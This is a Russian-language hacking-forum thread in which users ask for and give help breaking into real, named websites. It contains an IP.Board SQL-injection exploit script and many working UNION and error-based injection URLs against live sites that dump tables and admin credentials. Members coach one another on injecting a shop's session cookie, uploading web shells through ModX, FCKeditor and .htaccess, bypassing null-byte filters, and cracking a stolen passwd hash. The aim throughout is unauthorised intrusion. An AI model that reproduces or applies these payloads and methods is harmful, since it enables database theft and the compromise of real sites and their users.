В общем пытаюсь взломать движок IPB

С помощью эксплоита как называется эксплоит не знаю но нашёл на форуме "IPB версии 3.4.7 и меньше"

Там скрипт. при запуски скрипта у меня вылетает ошибка

Мне интересно с чем она связана

Вставлял разные сайты

Скрипт такой

.SpoilerTarget" type="button">Spoiler: Скрипт
#!/usr/bin/env python

# Sunday, November 09, 2014 - secthrowaway () safe-mail net

# IP.Board - http://sourceforge.net/projects/socksipy/

#import socks, socket

#socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050)

#socket.socket = socks.socksocket

# import urllib2, urllib

def inject(sql):

try: urllib2.urlopen(urllib2.Request('%sinterface/ipsconnect/ipsconnect.php' % url, data="act=login&idType=id&id[]=-1&id[]=%s" % urllib.quote('-1) and 1!="\'" and extractvalue(1,concat(0x3a,(%s)))#\'' % sql), headers={"User-agent": ua})) except urllib2.HTTPError, e:

if e.code == 503: data = urllib2.urlopen(urllib2.Request('%scache/sql_error_latest.cgi' % url, headers={"User-agent": ua})).read() txt = re.search("XPATH syntax error: '.*)'", data, re.MULTILINE)

if txt is not None:

return txt.group(1) sys.exit('Error [3], received unexpected data:\n%s' % data) sys.exit('Error [1]') sys.exit('Error [2]') def get(name, table, num): sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num) s = int(inject('LENGTH((%s))' % sqli))

if s

http://s019.radikal.ru/i600/1601/22/c2a9892ef69f.png

nik1201 said:
↑ (https://antichat.live/posts/3939690/)
Подскажите что можно сделать с этим? когда я вместо ника пишу
Вот ошибка
SQL: INSERT INTO pre_ucenter_members(uid,username,password,email,my id,myidkey,regip,regdate,lastloginip,lastlogintime ,salt,secques) VALUES (28472, ' ', '000', 'none', '', '', '', 1452657744, '0', '0', '111', '')
Error: Duplicate entry ' Errno.: 1062
Там кстати вместо ника если хоть что напишешь,то код вместо ника выполнятся будет,можно что бы простая кнопка была вместо ника)))


По ошибке видно что есть внедрение в insert запрос проверьте фильтрацию кавычек если отсутствует то можно крутить как error based

Возможно ли обойти двухфакторную аутентификацию?

compass said:
↑ (https://antichat.live/posts/3941045/)
Возможно ли обойти двухфакторную аутентификацию?


Да

всем привет,подскажите как правильно подставить запрос,

если быстро 2 раза нажать на ссылку получить кошель blockchain

A Database Error Occurred

Error Number: 1062

Duplicate entry 'hahaha_10056' for key 'id_user'

INSERT INTO `leadercoin_address` (`id`, `id_user`, `address`) VALUES (NULL, 'hahaha_10056', '1G01oF3CKn6f1jmYaQLTY1mXg3e6TL1XGE');

Filename: /home/misterbit/public_html/modules/wallet/controllers/wallet.php

Line Number: 137

сайт Query

Приветствую.

Чекаю на sql inj. сайт.

Вставляю payload в cookie, сайт - интернет магазин, идентификатор пользователя хранится в cookie переменной (её и чекаю)

Если переменная(идентиф-р) не найден корзина пишет - You have no items.

Сейчас заметил что payload вида...


frontend=79e4b338bee15a3d6ed248041302800c' AND 4050=4050#


канает т.к вывел товары - не фильтрует подумал я.

Как можно раскачать и вывести что мне надо?

Cпасибо!

madam said:
↑ (https://antichat.live/posts/3941504/)
всем привет,подскажите как правильно подставить запрос,
если быстро 2 раза нажать на ссылку получить кошель blockchain
A Database Error Occurred
Error Number: 1062
Duplicate entry 'hahaha_10056' for key 'id_user'
INSERT INTO `leadercoin_address` (`id`, `id_user`, `address`) VALUES (NULL, 'hahaha_10056', '1G01oF3CKn6f1jmYaQLTY1mXg3e6TL1XGE');
Filename: /home/misterbit/public_html/modules/wallet/controllers/wallet.php
Line Number: 137
сайт Query


Ошибка гласит что запись дублируется и вторую такую он создать не может, из этого в принципе ничего не возмешь.

hahaha_10056 это твой логин? Можно проверить на SQL инъекцию, поэкспериментируй с отправляемыми данными, но сам с скулями в INSERT еще не сталкивался, + раскрытие пути.


ol1ver said:
↑ (https://antichat.live/posts/3941654/)
Приветствую.
Чекаю на sql inj. сайт.
Вставляю payload в cookie, сайт - интернет магазин, идентификатор пользователя хранится в cookie переменной (её и чекаю)
Если переменная(идентиф-р) не найден корзина пишет - You have no items.
Сейчас заметил что payload вида...
frontend=79e4b338bee15a3d6ed248041302800c' AND 4050=4050#
канает т.к вывел товары - не фильтрует подумал я.
Как можно раскачать и вывести что мне надо?
Cпасибо!


Перебирай количество колонок: 79e4b338bee15a3d6ed248041302800c order by ..., далее делай запрос типаЖ -79e4b338bee15a3d6ed248041302800c union select 1,2,3 (кол-во столбцов)-- (обрати внимание на отрицательный параметр сессии) и посмотри, есть ли какие либо принтабельные поля, если да то это стандартная SQL инъекция. Если вывода нет, то тогда Blind

ArmusIAm said:
↑ (https://antichat.live/posts/3941655/)
сам с скулями в INSERT еще не сталкивался, + раскрытие пути.


Если раскрутить уязвимый параметр, то можно крутить как Error-Based

hahaha_10056 это имя базы данных

madam said:
↑ (https://antichat.live/posts/3941753/)
hahaha_10056 это имя базы данных


Сомневаюсь


madam said:
↑ (https://antichat.live/posts/3941504/)
всем привет,подскажите как правильно подставить запрос,
INSERT INTO `leadercoin_address` (`id`, `id_user`, `address`) VALUES (NULL, 'hahaha_10056', '1G01oF3CKn6f1jmYaQLTY1mXg3e6TL1XGE');


По крайней мере в данном случае hahaha_10056 запишется в поле id_user таблицы leadercoin_address в некой базе данных.

Всем привет)Прошу помощи.ЧТо это за ошибка ? Что с нее можно поиметь или она бесполезна?

http://s017.radikal.ru/i421/1601/9e/09e795bfbba5.png

Всем привет, помогите с XSS вот сайт galaxy.mobstudio.ru когда вставляю скрипт для проверки все между скобками фильтр удаляет пример , а если поставить пробел то оставляет, но не смог выполнить алерт никак

Всем привет!, у меня вопрос как вывести сразу все таблицы одним запросом?

http://www.site./news_p.php?id=613+union+select+1,table_name,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+informa tion_schema.tables+limit+1,1 --+++ (http://www.dinol.mk.ua/news_p.php?id=613+union+select+1,table_name,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+informa tion_schema.tables+limit+1,1 --+++)

Kolyan333 said:
↑ (https://antichat.live/posts/3941774/)
Всем привет,
помогите с XSS вот сайт galaxy.mobstudio.ru когда вставляю скрипт для проверки все между скобками фильтр удаляет пример , а если поставить пробел то оставляет, но не смог выполнить алерт никак


попробуй так


powerOfthemind said:
↑ (https://antichat.live/posts/3941765/)
Всем привет)Прошу помощи.ЧТо это за ошибка ? Что с нее можно поиметь или она бесполезна?
http://s017.radikal.ru/i421/1601/9e/09e795bfbba5.png


Не знаю что за ошибка, но по крайней мере в 19 строчке происходит запись в файл, можно попробовать поиграть с $_SERVER переменными (записать туда PHP код, который он запишет в лог файл, а потом подключить его инклудом если LFI есть)

Не могу сказать, прокатит или нет, но имя файла для хранения лога хранится в $file_log, есть вероятность что и ее можно подменить и сохранить лог куда тебе удобно)

madam said:
↑ (https://antichat.live/posts/3941753/)
hahaha_10056 это имя базы данных


INSERT INTO `leadercoin_address` (`id`, `id_user`, `address`) VALUES (NULL, 'hahaha_10056', '1G01oF3CKn6f1jmYaQLTY1mXg3e6TL1XGE');

в данном моменте leadercoin_address является таблицей в текущей БД.


powerOfthemind said:
↑ (https://antichat.live/posts/3941765/)
Всем привет)Прошу помощи.ЧТо это за ошибка ? Что с нее можно поиметь или она бесполезна?
http://s017.radikal.ru/i421/1601/9e/09e795bfbba5.png


$file_log, в какой файл пишет? и что в начале файла прописано? есть ли что нить типо die() или exit() в начале файла?


PulsarEX547 said:
↑ (https://antichat.live/posts/3941781/)
Всем привет!, у меня вопрос как вывести сразу все таблицы одним запросом?
http://www.site./news_p.php?id=613+union+select+1,table_name,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+informa tion_schema.tables+limit+1,1 --+++ (http://www.dinol.mk.ua/news_p.php?id=613+union+select+1,table_name,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+informa tion_schema.tables+limit+1,1%20--+++)


в выводимое поле вставте вот это:


(select(@x)from(select(@x:=0x00),(select(0)from(in formation_schema.columns)where(table_schema!=0x696 e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:= concat(@x,0x3c62723e,table_schema,0x2e,table_name, 0x3a,column_name))))x)

ArmusIAm said:
↑ (https://antichat.live/posts/3941655/)
Ошибка гласит что запись дублируется и вторую такую он создать не может, из этого в принципе ничего не возмешь.
hahaha_10056 это твой логин? Можно проверить на SQL инъекцию, поэкспериментируй с отправляемыми данными, но сам с скулями в INSERT еще не сталкивался, + раскрытие пути.
Перебирай количество колонок: 79e4b338bee15a3d6ed248041302800c order by ..., далее делай запрос типаЖ -79e4b338bee15a3d6ed248041302800c union select 1,2,3 (кол-во столбцов)-- (обрати внимание на отрицательный параметр сессии) и посмотри, есть ли какие либо принтабельные поля, если да то это стандартная SQL инъекция. Если вывода нет, то тогда Blind


Можете показать payload на моем примере?Спасибо

Залил шелл, через пару минут его удалили и закрыли уязвимость. Успел лишь прочесть файл passwd - есть в нем строчка:

asd.s1:$6$xWwfrGmNk3/4$DPN8qC1EU3vmjju8da3j1YBXOb6UIkyo7PC3xClb1R.l6Maj oyZsZpyn6FA0dyAntmH0WLw37F29TnV7qurOE1:604:604:asd .s1@asd.asd.ua (mailto:asd.s1@asd.asd.ua):/home/asd.s1:/bin/bash

Как я понимаю зашифрован пароль или я ошибаюсь?

Заранее спасибо за ответ.

2winstrool, спасибо! запрос сработал без заминок, единственное я бы хотел спросить как называется данный тип sqlinjection? и где можно поподробнее почитать гайдик нормальный по этой теме, для продвинутых если можно так сказать.

ol1ver said:
↑ (https://antichat.live/posts/3941885/)
Можете показать payload на моем примере?Спасибо


Для начала перебираешь кол-во колонок, следующим образом:

frontend=79e4b338bee15a3d6ed248041302800c order by 1#

Если отображает товары, значит запрос прошел, идем дальше.

frontend=79e4b338bee15a3d6ed248041302800c order by 5#

Если отображает товары, идем дальше

frontend=79e4b338bee15a3d6ed248041302800c order by 6#

Если в данном случае, не отображает - значит запрос не прошел, соответственно колонок получается 5 (это пример, у тебя по своему должно быть).

Если мы определили кол-во колонок, делаем следующее:

frontend=79e4b338bee15a3d6ed248041302800c union select 1,2,3,4,5-- (если у тебя колонок например 7, то до 7 (1,2,3,4,5,6,7))

Если все верно, то ошибки быть не должно, товары в корзине должны отображаться.

И далее:

frontend=-79e4b338bee15a3d6ed248041302800c union select 1,2,3,4,5--


Делаем значение frontend отрицательным, что бы посмотреть, если ли принтабельные поля (посмотри, появились ли где нибудь вместо текста циферки, например 1, 2, 4 любые, которых раньше не было.

Если есть, то это обычная инъекция, материала на эту тему много.

Если принтабельных полей нет, то это Blind SQL. Как его использовать тоже статей достаточно.


sysjuk said:
↑ (https://antichat.live/posts/3941899/)
Залил шелл, через пару минут его удалили и закрыли уязвимость. Успел лишь прочесть файл passwd - есть в нем строчка:
asd.s1:$6$xWwfrGmNk3/4$DPN8qC1EU3vmjju8da3j1YBXOb6UIkyo7PC3xClb1R.l6Maj oyZsZpyn6FA0dyAntmH0WLw37F29TnV7qurOE1:604:604:
asd.s1@asd.asd.ua (mailto:asd.s1@asd.asd.ua)
:/home/asd.s1:/bin/bash
Как я понимаю зашифрован пароль или я ошибаюсь?
Заранее спасибо за ответ.


Да ты прав, он зашифрован. Говорят программа John The Ripperс этим может справиться.

Успехов!)

Ниче не помогло

PulsarEX547 said:
↑ (https://antichat.live/posts/3941977/)
2winstrool, спасибо! запрос сработал без заминок
, единственное я бы хотел спросить как называется данный тип sqlinjection? и где можно поподробнее почитать гайдик нормальный по этой теме, для продвинутых если можно так сказать
.


/threads/43966/ (https://antichat.live/threads/43966/) -

SQL injection полный FAQ

Kolyan333 said:
↑ (https://antichat.live/posts/3942034/)
Ниче не помогло


Бро, ты конечно извини, но я не экстрасенс и не врач. Хочешь чтобы тебе помогли, описывай сложности как можно подробнее

winstrool said:
↑ (https://antichat.live/posts/3942050/)
/threads/43966/ (https://antichat.live/threads/43966/)
-
SQL injection полный FAQ


спс, разобрался вроде) делаю финальный запрос:

(select (@x) from (select (@x:=0x00),(select (0) from (admin)where (0x00) in (@x:=concat(@x,0x3c62723e,username,0x3a,pass))))x)

в ответ тишина, хотя с других таблиц вывод идет.. может быть просто эти поля в таблице пустые? или я что то непонимаю.... сколько старний аш обидно блин...

PulsarEX547 said:
↑ (https://antichat.live/posts/3942073/)
спс, разобрался вроде) делаю финальный запрос:
(select (@x) from (select (@x:=0x00),(select (0) from (admin)where (0x00) in (@x:=concat(@x,0x3c62723e,username,0x3a,pass))))x)
в ответ тишина
, хотя с других таблиц вывод идет.. может быть просто эти поля в таблице пустые? или я что то непонимаю.... сколько старний аш обидно блин...


Попробуй к таблице добавить имя БД, либо уже посмотри, есть в данной таблице записи count(*) from BD.admin

хотел скачать рисунок, а там http авторизация походу. как обойти?

http://naklejka.ru/image/data/naklejki/attributes/bpan-red2.svg

Сорри, если не туда задал вопрос

sysjuk said:
↑ (https://antichat.live/posts/3941899/)
Залил шелл, через пару минут его удалили и закрыли уязвимость. Успел лишь прочесть файл passwd - есть в нем строчка:
asd.s1:$6$xWwfrGmNk3/4$DPN8qC1EU3vmjju8da3j1YBXOb6UIkyo7PC3xClb1R.l6Maj oyZsZpyn6FA0dyAntmH0WLw37F29TnV7qurOE1:604:604:
asd.s1@asd.asd.ua (mailto:asd.s1@asd.asd.ua)
:/home/asd.s1:/bin/bash
Как я понимаю зашифрован пароль или я ошибаюсь?
Заранее спасибо за ответ.


Да пароль SHA512(Unix) https://en.wikipedia.org/wiki/Passwd#Shadow_file

наз


kingbeef said:
↑ (https://antichat.live/posts/3942184/)
Попробуй к таблице добавить имя БД, либо уже посмотри, есть в данной таблице записи count(*) from BD.admin


название бд добавлял, результата недало, а вот посмотреть есть ли там вообще что то было бы неплохо, но я несовсем понимаю как дать такой запрос:?

делаю такой, но он судя по всему неправильный:

?id=-613+union+select+1,COUNT(login,pass) FROM admin,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20 --+

подскажите как задать правильный запрос на проверку записей в полях таблицы?

также хотелось бы отметить что из других таблиц вывод идет как положенно, а тут скорее всего пустота, хотя и очень странно все это)))

PulsarEX547 said:
↑ (https://antichat.live/posts/3942278/)
наз
название бд добавлял, результата недало, а вот посмотреть есть ли там вообще что то было бы неплохо, но я несовсем понимаю как дать такой запрос:?
делаю такой, но он судя по всему неправильный
:
?id=-613+union+select+1,COUNT(login,pass) FROM admin,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20 --+
подскажите как задать правильный запрос на проверку записей в полях таблицы?
также хотелось бы отметить что из других таблиц вывод идет как положенно, а тут скорее всего пустота, хотя и очень странно все это)))


?id=-613+union+select+1,COUNT(login,pass),3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20 FROM admin--+

Если все правильно понял.

Ребят помогите пожалуйста

Считается это уязвимостью ?

Я отправил пост запрос с таким кодом

.SpoilerTarget" type="button">Spoiler: Код
&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
и выдало это

http://s35-temporary-files.radikal.ru/3cff322cfe0a4e038e209830a460de7e/-88693455.png

ребятки, можно тут что-то сделать. ЧТо то там с ' and " не понятно как-то

http://missourimhf.org/view-event.php?id=

BabaDook said:
↑ (https://antichat.live/posts/3942488/)
ребятки, можно тут что-то сделать. ЧТо то там с ' and " не понятно как-то
http://missourimhf.org/view-event.php?id=


Блин, ну это не стоило постить.

http://missourimhf.org/view-event.p...12,13,14,15,16,17,18,19,20--+k&table=schedule (http://missourimhf.org/view-event.php?id=227%27+and+0+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20--+k&table=schedule)

Sensoft said:
↑ (https://antichat.live/posts/3942468/)
Ребят помогите пожалуйста
Считается это уязвимостью ?
Я отправил пост запрос с таким кодом
Spoiler: Код
&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
и выдало это
http://s35-temporary-files.radikal.ru/3cff322cfe0a4e038e209830a460de7e/-88693455.png


Нет, обычный массив данных. Могу предположить передается яваскриптом при отправке формы.

kingbeef said:
↑ (https://antichat.live/posts/3942510/)
Блин, ну это не стоило постить.
http://missourimhf.org/view-event.php?id=227'+and+0+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20--+k&table=schedule (http://missourimhf.org/view-event.php?id=227%27+and+0+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20--+k&table=schedule)


ну Б*ть, ну 30 минут е++ся , спасибо.

Как залить шелл в ModX? пробовал через "елементы", но там некуда заливаться судя по всему, вот что там:

This directory is empty.Directories: 0

Files: 0

Data: 0 B

Directory writable? No.

Есть еще какие варианты? Я слышал через сниппеты, но как? нигде не нашел толковой подробной инфы....

+ Есть возможность добавить пхп код в модуль, я пробовал добавлять , но двиг ругался на CSRF типа его атакуют) как правильно через модуль залится?

PulsarEX547 said:
↑ (https://antichat.live/posts/3943411/)
Как залить шелл в ModX? пробовал через "елементы", но там некуда заливаться судя по всему, вот что там:
This directory is empty.Directories:
0
Files:
0
Data:
0 B
Directory writable?
No.
Есть еще какие варианты? Я слышал через сниппеты, но как? нигде не нашел толковой подробной инфы....
+ Есть возможность добавить пхп код в модуль, я пробовал добавлять , но двиг ругался на CSRF типа его атакуют) как правильно через модуль залится?


в системных настройках добавь возможность загрузки .php файлов, и через файлменеджер заливай

Вопрос насчет XSS. Фильтр пускает все, но есть защита , все что между скобок удаляет, и если поставить пробел через скобку тоже пускает, но как вывести алерт не понял. p.s не получилось. пож помогите. сайт скину в ЛС

Kolyan333 said:
↑ (https://antichat.live/posts/3943628/)
Вопрос насчет XSS.
Фильтр пускает все, но есть защита , все что между скобок удаляет, и если поставить пробел через скобку тоже пускает, но как вывести алерт не понял. p.s не получилось. пож помогите.
сайт скину в ЛС

yarbabin said:
↑ (https://antichat.live/posts/3943639/)



не получилось (

Br@!ns said:
↑ (https://antichat.live/posts/3943494/)
в системных настройках добавь возможность загрузки .php файлов, и через файлменеджер заливай


Ты видел что я написал? там нету директорий в которые можно хоть что то написать, и возможности записи - нет. Тут либо снипеты остаются, либо док менеджер...

Привет, вообщем нашел fckeditor. как через него залить шелл? может кто сталкивался?

http://i.imgur.com/qpY30Zi.png

RWD said:
↑ (https://antichat.live/posts/3944029/)
Привет, вообщем нашел fckeditor. как через него залить шелл? может кто сталкивался?
http://i.imgur.com/qpY30Zi.png


https://www.google.ru/search?q=fckeditor+заливка+шелла

Привет. Помогите раскрутить SQL:


Code:
https://www.sbxchanger.com/feedback.php?p=ok&page=/

jangle said:
↑ (https://antichat.live/posts/3944331/)
Привет. Помогите раскрутить SQL:

Code:
https://www.sbxchanger.com/feedback.php?p=ok&page=/



не крутиться вроде бы

Здраствуйте, не могу отправить пост форму ajax c сообщением. Проверка на CSRF , сообщение без перезагрузки страницы

Никаких скрытых параметров не передается, может есть какая то особенность в этих форм ?

Код формы


HTML:

Отправить сообщение


Мой код формы автоматической отправки с другого домена


HTML:

document.getElementsByTagName('form')[0].submit();

http://www.bbctop.cc/index.php?act=respons.respons&cid=%27 (http://www.bbctop.cc/index.php?act=respons.respons&cid=%2527)

Как подключится ?

пытался havil1.6 и дампером

не катит

Sensoft said:
↑ (https://antichat.live/posts/3944785/)
http://www.bbctop.cc/index.php?act=respons.respons&cid=%27 (http://www.bbctop.cc/index.php?act=respons.respons&cid=%2527)
Как подключится ?
пытался havil1.6 и дампером
не катит


Фильтрация на запятые.


Code:
http://www.bbctop.cc/index.php?act=respons.respons&cid=2+and+(1,2)=(1,2)+order+by+10+--+

http://www.bbctop.cc/index.php?act=respons.respons&cid=2+and+(1)=(1)+order+by+10+--+

Используйте конструкции join

BigBear said:
↑ (https://antichat.live/posts/3944795/)
Фильтрация на запятые.

Code:
http://www.bbctop.cc/index.php?act=respons.respons&cid=2+and+(1,2)=(1,2)+order+by+10+--+

http://www.bbctop.cc/index.php?act=respons.respons&cid=2+and+(1)=(1)+order+by+10+--+

Используйте конструкции join


Чёт не фига не получается

Sensoft said:
↑ (https://antichat.live/posts/3944813/)
Чёт не фига не получается


А что вы попробовали?

Покажите запрос.

BigBear said:
↑ (https://antichat.live/posts/3944840/)
А что вы попробовали?
Покажите запрос.


Ты не понял, я не очень шарю в языке php и sql

BigBear said:
↑ (https://antichat.live/posts/3944795/)
Фильтрация на запятые.

Code:
http://www.bbctop.cc/index.php?act=respons.respons&cid=2+and+(1,2)=(1,2)+order+by+10+--+
http://www.bbctop.cc/index.php?act=respons.respons&cid=2+and+(1)=(1)+order+by+10+--+

Используйте конструкции join


Если не сложно, расскажи более подробно. Очень интересно но сути не уловил.

В принципе, запрос итак проходит (к тому же на первом запросе, запятые по прежнему остаются в запросе?):


Code:
http://www.bbctop.cc/index.php?act=respons.respons&cid=27+order+by+10--

Проблема начинается в http://www.bbctop.cc/index.php?act=respons.respons&cid=-27+union+select+1,2,3,4,5,6,7,8,9,10--

Можешь показать на этом примере? Спасибо!

ArmusIAm said:
↑ (https://antichat.live/posts/3944937/)
Если не сложно, расскажи более подробно. Очень интересно но сути не уловил.
В принципе, запрос итак проходит (к тому же на первом запросе, запятые по прежнему остаются в запросе?):

Code:
http://www.bbctop.cc/index.php?act=respons.respons&cid=27+order+by+10--

Проблема начинается в
http://www.bbctop.cc/index.php?act=respons.respons&cid=-27+union+select+1,2,3,4,5,6,7,8,9,10--
Можешь показать на этом примере? Спасибо!


Потому что запятые. Я это написал ранее. Используйте конструкции без запятых.

(select+1)a join (select+2)b join (select+3)c

Топик называется "Помощь по уязвимостям", а не "Сделай всё за нас".

Мы помогаем, вы анализируете в чём косяк и пытаетесь решить, прикладывая свои решения.

А мы уже исправляем их и направляем в нужное русло.

Стратегия понятна?

как пример с join'ом:


http://www.bbctop.cc/index.php?act=...a8+join+(select+9)a9+join+(select +10)a10)+--+ (http://www.bbctop.cc/index.php?act=respons.respons&cid=2+and+(1)=(1)+union+(select+*+from+(select+1)a 1+join+(select+2)a2+join+(select+3)a3+join+(select +4)a4+join+(select+5)a5+join+(select+6)a6+join+(se lect+7)a7+join+(select+8)a8+join+(select+9)a9+join +(select+10)a10)+--+)


Но чето запрос, не проскачил, старею наверное(((

BigBear said:
↑ (https://antichat.live/posts/3944952/)
Топик называется "Помощь по уязвимостям", а не "Сделай всё за нас".
Мы помогаем, вы анализируете в чём косяк и пытаетесь решить, прикладывая свои решения.
А мы уже исправляем их и направляем в нужное русло.
Стратегия понятна?


Полностью согласен.


BigBear said:
↑ (https://antichat.live/posts/3944952/)
Code:
http://www.bbctop.cc/index.php?act=respons.respons&cid=2+and+(1,2)=(1,2)+order+by+10+--+
http://www.bbctop.cc/index.php?act=respons.respons&cid=2+and+(1)=(1)+order+by+10+--+
Используйте конструкции join


Дело в том, что ты так написал как будто выше - пример, отсюда недопонимание. А так Гугл вообще мой братец)

Какая альтернатива null byte в php 5.3.3? Вроде сам null byte пофиксили в 5.3.4

Filipp said:
↑ (https://antichat.live/posts/3945147/)
Какая альтернатива null byte в php 5.3.3? Вроде сам null byte пофиксили в 5.3.4


Вроде бы /////[4096]/////

BigBear said:
↑ (https://antichat.live/posts/3945154/)
Вроде бы /////[4096]/////


Я сделал таким образом: script.php?go=index.php///...///, дало ошибку, типа невозможно открыть. Но уже в конце расширения не дописывается. Возможно я чего-то делаю не так?

Filipp said:
↑ (https://antichat.live/posts/3945208/)
Я сделал таким образом: script.php?go=index.php///...///, дало ошибку, типа невозможно открыть. Но уже в конце расширения не дописывается. Возможно я чего-то делаю не так?


Подбери точное количество слэшей

http://raz0r.name/articles/null-byte-alternative/

https://rdot.org/forum/showthread.php?t=2611

Привет, подскажите

Есть папка для картинок, в нее загружается php файл, но в htaccess такое. И в итоге шел не работает.


Code:
Options -Indexes

php_value engine off

php_value engine off

RWD said:
↑ (https://antichat.live/posts/3945536/)
Привет, подскажите
Есть папка для картинок, в нее загружается php файл, но в htaccess такое. И в итоге шел не работает.

Code:
Options -Indexes

php_value engine off

php_value engine off




Все правильно, php шел в ней работать не будет!

BigBear said:
↑ (https://antichat.live/posts/3945247/)
Подбери точное количество слэшей
http://raz0r.name/articles/null-byte-alternative/
https://rdot.org/forum/showthread.php?t=2611


Подобрал что бы было ровно 4096 символов, и все равно ошибка инклуда. Похоже в этой версии этот трюк уже не работает.

Filipp said:
↑ (https://antichat.live/posts/3945574/)
Подобрал что бы было ровно 4096 символов, и все равно ошибка инклуда. Похоже в этой версии этот трюк уже не работает.


с 5.3 не работает. https://rdot.org/forum/showthread.php?t=343

Пожалуйста,помогите найти таблицу пользователей просмотрел все, но найти почему-то не смог (

http://som.adzu.edu.ph/newsupdates/...5,6 from information_schema.tables limit 97,1 (http://som.adzu.edu.ph/newsupdates/index.php?id=-1%20union%20select%201,unhex%28hex%28table_name%29 %29,3,database%28%29,5,6%20from%20information_sche ma.tables%20limit%2097,1)

MDen1s said:
↑ (https://antichat.live/posts/3945801/)
Пожалуйста,помогите найти таблицу пользователей просмотрел все, но найти почему-то не смог (
http://som.adzu.edu.ph/newsupdates/...5,6 from information_schema.tables limit 97,1 (http://som.adzu.edu.ph/newsupdates/index.php?id=-1%20union%20select%201,unhex%28hex%28table_name%29 %29,3,database%28%29,5,6%20from%20information_sche ma.tables%20limit%2097,1)


ее может и не быть, ибо не было бы этой темы /threads/424558/ (https://antichat.live/threads/424558/)

Подскажите на какие ошибки можно еще проверить?

именно массово. Есть база доменов, проверял на кавычку, и гит. Есть еще какие идеи?

RWD said:
↑ (https://antichat.live/posts/3946268/)
Подскажите на какие ошибки можно еще проверить?
именно массово. Есть база доменов, проверял на кавычку, и гит. Есть еще какие идеи?


На вордпресс и джумлу еще, на майдамин незапароленный. А если уязвимости, то выбор тут невелик, по-моему: инклуды, sql, xss. XSS можно снимком экрана проверять, phantomjs такое из-коробки умеет делать, к примеру.

Заранее прошу прощение за возможный оффтоп, но я уже множество статей и форумов перерыл по поводу темы xss, в том числе и на данном ресурсе.

Пытаюсь разобраться с xss, но никак не удаётся, к тому же многие темы примерно 10-и летней давности и мне кажется, что сейчас многое изменилось, в том числе и уязвимости уже не те. Меня интересует xss и куки в почте. Подскажите свежие темы? Или кто может помочь с этим? Буду очень благодарен, и возможно финансовая благодарность.

zot123 said:
↑ (https://antichat.live/posts/3946531/)
Заранее прошу прощение за возможный оффтоп, но я уже множество статей и форумов перерыл по поводу темы xss, в том числе и на данном ресурсе.
Пытаюсь разобраться с xss, но никак не удаётся, к тому же многие темы примерно 10-и летней давности и мне кажется, что сейчас многое изменилось, в том числе и уязвимости уже не те. Меня интересует xss и куки в почте. Подскажите свежие темы? Или кто может помочь с этим? Буду очень благодарен, и возможно финансовая благодарность.


В XSS ничего не изменилось,браузеры фильтруют XSS лучше чем когда то,флаг httponly мешает,инфа если будет то приватно

RWD said:
↑ (https://antichat.live/posts/3945536/)
Привет, подскажите
Есть папка для картинок, в нее загружается php файл, но в htaccess такое. И в итоге шел не работает.

Code:
Options -Indexes

php_value engine off

php_value engine off




попробуй загрузить свой .htaccess

кстати можно заодно и шелл в .htaccess запилить /threads/298338/ (https://antichat.live/threads/298338/)

Нашел sqli на сайте - (post method)

1) подобрал количество столбцов -24, запрос отработал, ошибка пропала, все вроде как норм.

webcastID=' order by 24-- -&username=sdfsdf&password=sdfsdfsd&terms=true&submit=LOG+IN+NOW&submitted=true&FlVer=20%2C0%2C0%2C286&jvaVer=1%2C8%2C0%2C60&ihatespam=withapassion

2) даю второй запрос на колонки, снова появляется ошибка, и выводимой колонки так и нет(

webcastID=' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24-- -&username=sdfsdf&password=sdfsdfsd&terms=true&submit=LOG+IN+NOW&submitted=true&FlVer=20%2C0%2C0%2C286&jvaVer=1%2C8%2C0%2C60&ihatespam=withapassion

Как так, и что делать дальше?

MDen1s said:
↑ (https://antichat.live/posts/3945801/)
Пожалуйста,помогите найти таблицу пользователей просмотрел все, но найти почему-то не смог (
http://som.adzu.edu.ph/newsupdates/...5,6 from information_schema.tables limit 97,1 (http://som.adzu.edu.ph/newsupdates/index.php?id=-1%20union%20select%201,unhex%28hex%28table_name%29 %29,3,database%28%29,5,6%20from%20information_sche ma.tables%20limit%2097,1)


ты что все это руками перебирал через лимит? Так уже никто не делает)

http://som.adzu.edu.ph/newsupdates/index.php?id=-1 union select 1,(select(@x)from(select(@x:=0x00),(select(0)from( information_schema.columns)where(table_schema!=0x6 96e666f726d6174696f6e5f736368656d61)and(0x00)in(@x :=concat(@x,0x3c62723e,table_schema,0x2e,table_nam e,0x3a,column_name))))x),3,4,5,6-- - (http://som.adzu.edu.ph/newsupdates/index.php?id=-1%20union%20select%201,%28select%28@x%29from%28sel ect%28@x:=0x00%29,%28select%280%29from%28informati on_schema.columns%29where%28table_schema!=0x696e66 6f726d6174696f6e5f736368656d61%29and%280x00%29in%2 8@x:=concat%28@x,0x3c62723e,table_schema,0x2e,tabl e_name,0x3a,column_name%29%29%29%29x%29,3,4,5,6--%20-)

все базы.таблицы:колонки смотри что надо в удобоваримом виде.

-1 /*!50000union*/+/*!50000sElect*/ 1,file_priv,3,4,5,6 from mysql.users-- -

SELECT command denied to user 'som'@'localhost' for table 'users'

странно почему SELECT не получилось провести, или ту дело не в фильтре?....

PulsarEX547 said:
↑ (https://antichat.live/posts/3946732/)
Нашел sqli на сайте - (post method)
1) подобрал количество столбцов -24, запрос отработал, ошибка пропала, все вроде как норм.
